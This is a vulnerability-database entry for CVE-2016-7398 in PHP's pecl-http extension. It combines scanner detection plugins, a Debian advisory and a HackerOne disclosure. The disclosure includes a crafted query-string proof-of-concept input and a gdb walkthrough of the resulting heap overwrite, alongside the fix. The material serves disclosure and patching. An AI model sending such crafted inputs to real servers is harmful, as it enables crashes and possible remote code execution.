ID: CVE-2016-7398 | Type: cve | Reporter: cve@mitre.org | Modified: 2019-09-20T21:15:00
Description
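A type confusion vulnerability in the merge_param() function of php_http_params.c in PHP's pecl-http extension, versions 3.1.0beta2 and earlier (PHP 7) and 2.6.0beta2 and earlier (PHP 5), allows attackers to crash PHP and possibly execute arbitrary code via crafted HTTP requests. According to the linked HackerOne report, merge_param() used a value as an array without checking its type; the upstream patch adds that type check, and Debian 8 "Jessie" carries the fix in php-pecl-http 2.0.4-1+deb8u1.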
{"openvas": [{"lastseen": "2020-01-29T19:25:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7398"], "description": "The remote host is missing an update for the 'php-pecl-http' package(s) announced via the DLA-1929-1 advisory.", "modified": "2020-01-29T00:00:00", "published": "2019-09-21T00:00:00", "id": "OPENVAS:1361412562310891929", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891929", "type": "openvas", "title": "Debian LTS: Security Advisory for php-pecl-http (DLA-1929-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891929\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-7398\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-09-21 02:00:24 +0000 (Sat, 21 Sep 2019)\");\n script_name(\"Debian LTS: Security Advisory for php-pecl-http (DLA-1929-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/09/msg00022.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1929-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php-pecl-http'\n package(s) announced via the DLA-1929-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A vulnerability has been discovered in php-pecl-http, the pecl_http\nmodule for PHP 5 Extended HTTP Support. 
A type confusion vulnerability\nin the merge_param() function allows attackers to crash PHP and possibly\nexecute arbitrary code via crafted HTTP requests.\");\n\n script_tag(name:\"affected\", value:\"'php-pecl-http' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', this problem has been fixed in version\n2.0.4-1+deb8u1.\n\nWe recommend that you upgrade your php-pecl-http packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"php5-pecl-http\", ver:\"2.0.4-1+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-pecl-http-dev\", ver:\"2.0.4-1+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-08-12T01:05:23", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7398"], "description": "Package : php-pecl-http\nVersion : 2.0.4-1+deb8u1\nCVE ID : CVE-2016-7398\n\n\nA vulnerability has been discovered in php-pecl-http, the pecl_http\nmodule for PHP 5 Extended HTTP Support. 
A type confusion vulnerability\nin the merge_param() function allows attackers to crash PHP and possibly\nexecute arbitrary code via crafted HTTP requests.\n\nFor Debian 8 \"Jessie\", this problem has been fixed in version\n2.0.4-1+deb8u1.\n\nWe recommend that you upgrade your php-pecl-http packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 11, "modified": "2019-09-20T19:08:13", "published": "2019-09-20T19:08:13", "id": "DEBIAN:DLA-1929-1:430B5", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201909/msg00022.html", "title": "[SECURITY] [DLA 1929-1] php-pecl-http security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T09:41:27", "description": "A vulnerability has been discovered in php-pecl-http, the pecl_http\nmodule for PHP 5 Extended HTTP Support. A type confusion vulnerability\nin the merge_param() function allows attackers to crash PHP and\npossibly execute arbitrary code via crafted HTTP requests.\n\nFor Debian 8 'Jessie', this problem has been fixed in version\n2.0.4-1+deb8u1.\n\nWe recommend that you upgrade your php-pecl-http packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-09-23T00:00:00", "title": "Debian DLA-1929-1 : php-pecl-http security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7398"], "modified": "2019-09-23T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:php5-pecl-http", "cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:php5-pecl-http-dev"], "id": "DEBIAN_DLA-1929.NASL", "href": "https://www.tenable.com/plugins/nessus/129106", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1929-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129106);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-7398\");\n\n script_name(english:\"Debian DLA-1929-1 : php-pecl-http security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered in php-pecl-http, the pecl_http\nmodule for PHP 5 Extended HTTP Support. 
A type confusion vulnerability\nin the merge_param() function allows attackers to crash PHP and\npossibly execute arbitrary code via crafted HTTP requests.\n\nFor Debian 8 'Jessie', this problem has been fixed in version\n2.0.4-1+deb8u1.\n\nWe recommend that you upgrade your php-pecl-http packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/09/msg00022.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/php-pecl-http\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected php5-pecl-http, and php5-pecl-http-dev packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pecl-http\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pecl-http-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/09/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/23\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"php5-pecl-http\", reference:\"2.0.4-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-pecl-http-dev\", reference:\"2.0.4-1+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-04-19T17:34:08", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2016-7398"], "description": "Since the original report is still marked as private in the PHP bug tracker please find the copy & pasted bug report below (edited for readability and to include correct bug tracker id). 
See the references section for a link to the issue in the PHP bug tracker!\n\nThe maintainer already fixed the issue in the public git repo using the proposed patch included in the original report.\n\nMitre assigned **CVE-2016-7398** for this issue.\n\n# Description\n\nThe url parsing functions of the PECL HTTP extension allow overflowing\na heap-based buffer with data originating from an arbitrary HTTP request.\nAffected is the `merge_param()` function in `php_http_params.c` that is called\nfrom `php_http_querystring_parse()`: \n\nCode fragment from `merge_param()` in `php_http_params.c:491`:\n\n```c\nstatic void merge_param(HashTable *params, zval *zdata, ...)\n{\n/*[...]*/\n while (Z_TYPE_P(zdata_ptr) == IS_ARRAY && (test_ptr = zend_hash_get_current_data(Z_ARRVAL_P(zdata_ptr)))) {\n if (Z_TYPE_P(test_ptr) == IS_ARRAY) {\n zval *tmp_ptr = ptr;\n \n/*[...]*/ \n } else {\n if ((ptr = zend_hash_index_find(Z_ARRVAL_P(ptr), hkey.h))) {\n zdata_ptr = test_ptr;\n } else if (hkey.h) {\n ptr = tmp_ptr;\n Z_TRY_ADDREF_P(test_ptr);\n/*[511]*/ ptr = zend_hash_index_update(Z_ARRVAL_P(ptr), hkey.h, test_ptr);\n/*[...]*/\n```\n\nIn line 511 `zend_hash_index_update()` is called with ptr used as an array\n(`Z_ARRVAL_P(ptr)`) without actually checking its type. Thus it was possible\nto call `zend_hash_index_update()` on a `zend_string` instead which obviously\nleads to memory corruption issues.\n\nThe sample request provided in this report uses this type confusion\nvulnerability to trigger an arbitrary heap overwrite. 
The actual overwrite\noccurs in `_zend_hash_index_add_or_update_i()`: \n\n```c\nstatic zend_always_inline zval *_zend_hash_index_add_or_update_i(HashTable *ht, zend_ulong h, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)\n{\n/*[...]*/\nadd_to_hash:\n/*[...]*/\n p = ht->arData + idx;\n p->h = h;\t\t\t\t\t\t// <- heap overflow\n p->key = NULL;\t\t\t\t\t// <- heap overflow\n/*[...]*/\n```\n\nBecause of the invalid pointer provided as HashTable `ht->arData` points\nto an unexpected memory location on the heap and not to the list of Buckets\nof an ordinary `HashTable`. So the two following assignments allow to write\narbitrary values (`hkey.h` and `NULL`) on the heap.\nAs it turned out `hkey.h` can be controlled with request data received from\nthe network. \nThe attached proof of concept demonstrates that this flaw very likely allows\nfor remote code execution.\n\nThis vulnerability was found using `afl-fuzz`/`afl-utils`.\n\n# PoC\n\nSee the attached patch for the sample request in `bug73055.bin`.\n\n```\n$ cat http_querystring.php\n/*\n * http_querystring.php\n */\n<?php\n $qs = new http\\QueryString(file_get_contents(\"bug73055.bin\"));\n?>\n$ ./configure --enable-raphf --enable-propro --with-http && make\n$ gdb ./sapi/cli/php\ngdb> b php_http_params.c:511\ngdb> r http_querystring.php\n Breakpoint 1, merge_param (zdata=0x7fffffff9cf0, current_args=0x7fffffff9dd8, current_param=0x7fffffff9de0,\n params=<optimized out>) at php_http_params.c:511\n 511\t\t\t\tptr = zend_hash_index_update(Z_ARRVAL_P(ptr), hkey.h, test_ptr);\ngdb> p ptr.u1.type_info\n $1 = 6 // <-- IS_STRING, incorrect type!\ngdb> b zend_hash.c:811\ngdb> c\n Breakpoint 2, _zend_hash_index_add_or_update_i (flag=1, pData=0x7ffff425c6a0, h=16706, ht=0xf53dc0) at\n zend_hash.c:811\n 811\t\tp->h = h;\t\t\t\t\t\t// <- heap overflow\ngdb> p &p->h\n $2 = (zend_ulong *) 0x1091f40\ngdb> x/8gx 0x1091f20 // heap before overflow\n 0x1091f20:\t0x000000006c72755c\t0x0000000000000021\n 
0x1091f30:\t0x00007ffff5addb48\t0x0000000001092960\n 0x1091f40:\t0x0000000000000020\t0x0000000000000031 <-- heap meta-data (prev-size, size)\n 0x1091f50:\t0x0000070600000001\t0x800000017c9c614a\ngdb> ni 2\ngdb> x/8gx 0x1091f20 // heap after overflow\n 0x1091f20:\t0x000000006c72755c\t0x0000000000000021\n 0x1091f30:\t0x00007ffff5addb48\t0x0000000001092960\n 0x1091f40:\t0x0000000000004142\t0x0000000000000000 <-- heap meta-data overwritten*\n 0x1091f50:\t0x0000070600000001\t0x800000017c9c614a\n /*\n * (*) 0x4142 originates from bug73055.bin offset 0x59\n * The numeric string '16706' is converted into the integer\n * it is representing 0x4142 (see sanitize_dimension()).\n */\ngdb> bt // for the record\n #0 _zend_hash_index_add_or_update_i (flag=1, pData=0x7ffff425c6a0, h=16706, ht=0xf53dc0) at zend_hash.c:815\n #1 _zend_hash_index_update (ht=0xf53dc0, h=16706, pData=pData@entry=0x7ffff425c6a0) at zend_hash.c:838\n #2 0x00000000006b032b in merge_param (zdata=0x7fffffff9cf0, current_args=0x7fffffff9dd8, current_param=0x7fffffff9de0, params=<optimized out>) at php_http_params.c:511\n #3 push_param (params=<optimized out>, state=<optimized out>, opts=<optimized out>) at php_http_params.c:607\n #4 0x00000000006b2475 in php_http_params_parse (params=params@entry=0x7ffff42023f0, opts=opts@entry=0x7fffffff9e80) at php_http_params.c:755\n #5 0x00000000006b5479 in php_http_querystring_parse (ht=0x7ffff42023f0, str=str@entry=0x7ffff4282018 '[' <repeats 27 times>, \"]]]]\", '[' <repeats 38 times>, \"&%C0[]E[=&2[&%C0[]E[16706[*[\", len=<optimized out>) at php_http_querystring.c:224\n #6 0x00000000006b552c in php_http_querystring_update (qarray=qarray@entry=0x7fffffff9f80, params=params@entry=0x7ffff4213130, outstring=outstring@entry=0x0) at php_http_querystring.c:268\n #7 0x00000000006b6029 in php_http_querystring_set (flags=0, params=0x7ffff4213130, instance=0x7ffff4213100) at php_http_querystring.c:49\n #8 zim_HttpQueryString___construct (execute_data=<optimized out>, 
return_value=<optimized out>) at php_http_querystring.c:365\n #9 0x00000000007b0a93 in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER () at zend_vm_execute.h:970\n [...]\ngdb> dis 1 2\ngdb> c\n Fatal error: Uncaught http\\Exception\\BadQueryStringException: http\\QueryString::__construct(): Max input nesting level of 64 exceeded in http_querystr.php:5\n Stack trace:\n #0 http_querystr.php(5): http\\QueryString->__construct('[[[[[[[[[[[[[[[...')\n #1 {main}\n \n Next \u0001\n thrown in http_querystr.php on line 5\n *** Error in `sapi/cli/php': free(): invalid pointer: 0x0000000001091f50 ***\n Program received signal SIGABRT, Aborted.\n 0x00007ffff577804f in raise () from /usr/lib/libc.so.6\n```\n\n# Patch\n\nAfter careful review by the project maintainers the following patch may be used\nto fix the reported issue. \n\n From 34ae784c44be4a60157947f8ccc8c918e9b6ba40 Mon Sep 17 00:00:00 2001\n From: rc0r <hlt99@blinkenshell.org>\n Date: Fri, 9 Sep 2016 11:31:57 +0200\n Subject: [PATCH] Type confusion vulnerability in merge_param() (#73055) fixed\n \n ---\n src/php_http_params.c | 2 +-\n tests/bug73055.phpt | 25 +++++++++++++++++++++++++\n tests/data/bug73055.bin | 1 +\n 3 files changed, 27 insertions(+), 1 deletion(-)\n create mode 100644 tests/bug73055.phpt\n create mode 100644 tests/data/bug73055.bin\n \n diff --git a/src/php_http_params.c b/src/php_http_params.c\n index 8988f43..0846f47 100644\n --- a/src/php_http_params.c\n +++ b/src/php_http_params.c\n @@ -489,7 +489,7 @@ static void merge_param(HashTable *params, zval *zdata, zval **current_param, zv\n zval *test_ptr;\n \n while (Z_TYPE_P(zdata_ptr) == IS_ARRAY && (test_ptr = zend_hash_get_current_data(Z_ARRVAL_P(zdata_ptr)))) {\n -\t\t\t\tif (Z_TYPE_P(test_ptr) == IS_ARRAY) {\n +\t\t\t\tif ((Z_TYPE_P(test_ptr) == IS_ARRAY) && (Z_TYPE_P(ptr) == IS_ARRAY)) {\n zval *tmp_ptr = ptr;\n \n /* now find key in ptr */\n diff --git a/tests/bug73055.phpt b/tests/bug73055.phpt\n new file mode 100644\n index 0000000..260e823\n 
--- /dev/null\n +++ b/tests/bug73055.phpt\n @@ -0,0 +1,25 @@\n +--TEST--\n +Type confusion vulnerability in merge_param()\n +--SKIPIF--\n +<?php\n +include \"skipif.inc\";\n +?>\n +--FILE--\n +<?php\n +\n +echo \"Test\\n\";\n +try {\n +\techo new http\\QueryString(file_get_contents(__DIR__.\"/data/bug73055.bin\")); // <- put provided sample into correct location\n +} catch (Exception $e) {\n +\techo $e;\n +}\n +?>\n +\n +===DONE===\n +--EXPECTF--\n +Test\n +%r(exception ')?%rhttp\\Exception\\BadQueryStringException%r(' with message '|: )%rhttp\\QueryString::__construct(): Max input nesting level of 64 exceeded in %sbug73055.php:5\n +Stack trace:\n +#0 %sbug73055.php(5): http\\QueryString->__construct('[[[[[[[[[[[[[[[...')\n +#1 {main}\n +===DONE===\n \\ No newline at end of file\n diff --git a/tests/data/bug73055.bin b/tests/data/bug73055.bin\n new file mode 100644\n index 0000000..ad2dd9f\n --- /dev/null\n +++ b/tests/data/bug73055.bin\n @@ -0,0 +1 @@\n +[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]][[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[&%C0[]E[=&2[&%C0[]E[16706[*[\n \\ No newline at end of file\n -- \n 2.9.3\n\n# Versions known to be affected\n\npecl-http extension versions up to and including:\n\n* 3.1.0beta2 (PHP 7)\n* 2.6.0beta2 (PHP 5)\n\n\n# Timeline\n\n2016-09-09 Initial report to PHP bug tracker (#73055)\n2016-09-12 Issue fixed in git repository, CVE requested\n2016-09-13 Mitre assigned CVE-2016-7398\n\n\n# References\n\nhttps://bugs.php.net/bug.php?id=73055\nhttps://github.com/m6w6/ext-http/commit/17137d4ab1ce81a2cee0fae842340a344ef3da83\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7398\n", "modified": "2017-05-30T15:13:53", "published": "2016-09-27T14:03:13", "id": "H1:172411", "href": "https://hackerone.com/reports/172411", "type": "hackerone", "title": "PHP (IBB): Heap overflow caused by type confusion vulnerability in merge_param()", "cvss": {"score": 0.0, "vector": "NONE"}}]}